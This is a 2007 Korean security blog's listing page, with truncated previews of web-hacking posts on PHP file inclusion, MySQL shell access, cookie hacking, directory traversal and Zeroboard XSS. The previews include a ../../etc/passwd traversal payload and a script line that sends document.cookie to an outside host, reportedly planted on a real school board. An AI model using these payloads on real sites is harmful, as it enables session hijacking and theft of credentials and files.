전체 글 검색 결과

해당 글 845

PHP Injection

일반적인 PHP injection 공격 방법을 시험해 볼 것이다. 모의 공격을 위해, 공격을 당할 서버에 PHP Injection에 취약한 다음 code를 업로드할 것이다. // test.php [공격 당할 서버 예제 사진] $var 변수에 `test'라는 값을 입력하자, include path error가 출력되었다. 결론적으로 우리는 $var 변수에 공격 코드 URL을 입력하여 명령을 삽입할 수 있게 된다. 그 후, 공격자의 웹서버에 다음 code를 업로드할 것이다. // attack [공격자의 서버 예제 사진] $command 변수를 통해 시스템 명령어를 수행할 수 있도록 passthru() 함수를 사용하였다. 자, 그럼 모의 공격을 시도해보자. 다음과 같이 $var 변수에 `attacker_hos..
Security/Web 2007. 3. 9. 01:16

Mysql 을 이용한 쉘 획득법

이런 짓을 실제로 쓸떄가 있나요? -_-; 본인 같은 경우는 실제로 쓸떄가 있었다. 어째든 쓸 경우는 mysql 계정은 획득 했지만, shell은 얻지 못했을 경우 사용하는 것 이다. (*__) 1. 대상 mysql 서버에 접속을 합니다. Administrator>mysql -h dualexample.com -u dual -p Enter password: ************ Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1101 to server version: 4.1.15-Debian_1-log Type 'help;' or '\h' for help. Type '\c' to clear the bu..
Security/Web 2007. 3. 9. 01:10

쿠키해킹의 개념

Web 에서 많이 쓰이는 Cookie 에 관한 내용이다. Cookie 란 무엇인가? Web Language 에서 Cookie 는 여러가지에 유용하게 쓰인다. Cookie 는 Client Computer 에 저장되는 것인데, CGI Program 에서는 이 Cookie 를 이용하여 좀 더 편리하고 간편한 CGI 를 짤 수도 있다. 예를 들어 Web Board 에서 각 Page 마다 인증이 필요한 경우도 있다. 뭐 admin 만 Access 할 수 있다던지 하는 Page 일 경우에 말이다. 이럴 경우 매 Page 의 Head 부분에 Client Computer 에서 Cookie 를 받아와 Access 하려는 사용자가 권한이 되는지 안되는지 알 수 있게끔 Cookie 가 사용될 수도 있다. 여기에서는 한때 I..
Security/Web 2007. 3. 8. 22:45

Directory traversal

다음달 2일날 cissp 시험과 업무로 인해 정신이 없네요...ㅜ.ㅜ 파일 다운로드 두번째 이야기는 별거 아닙니다만 그래도 PT하시는분들께 도움이 될까 하는 생각에 몇자 적어보겠습니다. 뭐....미리 알고 계신 이야기라면....-_-; 그냥 패스하시면 되겠죠...? 아래와 같은 URL을 통해 파일을 다운로드 한다고 가정하겠습니다. http://domain.co.kr/bbs/download.php?filename=test.hwp 그러면 아마도...물론 저도...제일 먼저 하는건 test.hwp 대신에 /etc/passwd를 해봅니다. 되면 다행(?)이지만 안되는 경우도 많습니다. 안 될 경우 저는 /etc/passwd 대신에 ../../../../../../../../../../etc/passwd와 같이 ..
Security/Web 2007. 3. 8. 22:43

Directory traversal

웹 어플리케이션을 PHP로 그리고 OS는 유닉스계열(리눅스 포함)으로 제한하여 썰을 풀도록 하겠습니다. 보통 다운로드 취약점이라고 하면 저는 다음과 같이 합니다. 1.게시판을 찾는다. 2.제시판 중에서 파일을 다운로드 할 수 있는 자료실을 찾는다. 3.자료실 중에서도 절대경로를 이용하지 않고 download.php를 이용할 경우 계속한다.(절대경로 이용시 패스~) 4.download.php의 파라미터로 들어가는 값들 중 파라미터값이 숫자이면 이 파라미터를 제거하고 파일을 다운로드 한다. ex) http://victim/bbs/download.php?cod=abc&no=10&idx=1&filename=kkk.doc 위와 같은 URL에서 no=10&idx=1을 빼고 URL을 입력하는 거죠.. 5.위와 같이 ..
Security/Web 2007. 3. 8. 22:43

제로보드 pl7

명칭 : 제로보드 XSS 취약점 발령일시 : 3월14일 해당시스템 : 4.1 pl 7 위험도 : ★★★★★ 최초 보고자 : 유동훈 한국 보안회사 아이넷캅의 유동훈님이 발견한 제로보드 버그가 발표되어 화제를 모으고 있다. 이번 버그는 바로 얼마전 유행했던 웹쉘 인젝션 기법이 아닌 새로운 것으로써 XSS(크로스 사이트 스크립팅) 공격의 일종으로 알려지고 있다. 또한 이 새로운 제로보드 버그는 관리자를 직접 겨냥한 XSS 공격으로써 실제 공격과 응용된 공격이 이루어지면 상당한 파장을 일으킬 것으로 예상되고 있다. 이 공격의 주된 원리는 IP 세션 무력화 기법을 사용하여 제로보드에 사용된 관련 알고리즘을 우회하는 공격으로 보면 된다. 좀 더 자세히 설명을 드리자면 메모함의 제목과 사용자의 정보가 기록되는 부분인..
Security/Web 2007. 3. 8. 22:42

제로보드 pl7

======================================================================================= 0x00. 배경 설명 0x01. GET, POST method request와 iframe tag 0x02. 실제 적용되는 공격 0x03. End ======================================================================================= 0x00. 배경 설명 따로 'GET, POST method iframe exploit' 이라는 이름을 붙인 이유는 기존 공격들과 구분을 할 필요성을 느꼈기 때문이다. 현재까지 웹컨텐츠 해킹기법은 많은 발전을 해왔다. 단순한 Cookie spoofing..
Security/Web 2007. 3. 8. 22:37

XSS - 메일로 전송하기

흔히 XSS 공격을 할때 가장 중요한건 상대방의 session_id가 소멸 되기 전에 자신의 session_id를 상대방 걸로 바꿔 치는건데, 계속 메일창만 드려다 볼수는 없는 노릇임으로, 적절한 작전이 필요한데, 최상의 방법은 바로 MSN 메일을 쓰는 것이다. MSN 메신져를 켜둔 상태에서 MSN 메일에 새로운 메일이 도착하면 알려주는 서비스를 이용해 우리는 신속하게 session_id를 사용할 수 있게 된다. 실제로 학교 웹하드 게시판에 이렇게 글을 적어 두었다. 제목 : 우와 진짜 끝내 주네요! 내용 : 이젠 웹링크도 지원되고 정말 좋은거 같습니다!! i.location="http://rvc.muz.ro/1.php?c="+document.cookie 스크립트가 들어갔지만 실제로 화면으론 다음과 같이..
Security/Web 2007. 3. 8. 22:36